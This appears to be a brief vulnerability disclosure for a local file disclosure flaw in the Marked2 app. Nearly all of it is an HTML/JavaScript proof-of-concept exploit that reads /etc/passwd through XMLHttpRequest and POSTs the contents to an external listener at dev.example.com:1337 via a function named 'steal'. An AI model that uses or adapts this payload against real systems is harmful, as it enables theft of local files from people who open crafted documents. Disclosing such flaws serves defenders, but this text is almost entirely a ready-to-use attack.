Marked2 suffers from a local file disclosure vulnerability.
3afe747dc610f85ce34fd6595093e3c0f7fd5d04e4fcb4ea03d5ae1c138962dd
<body>
<script>
var file = "file:///etc/passwd";
var extract = "http://dev.example.com:1337/";
function get(url) {
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", url, false);
xmlHttp.send(null);
return xmlHttp.responseText;
}
function steal(data) {
var xhr = new XMLHttpRequest();
xhr.open('POST', extract, true);
xhr.onload = function() {};
xhr.send(data);
}
var cdl = get(file);
steal(cdl);
</script>
</body>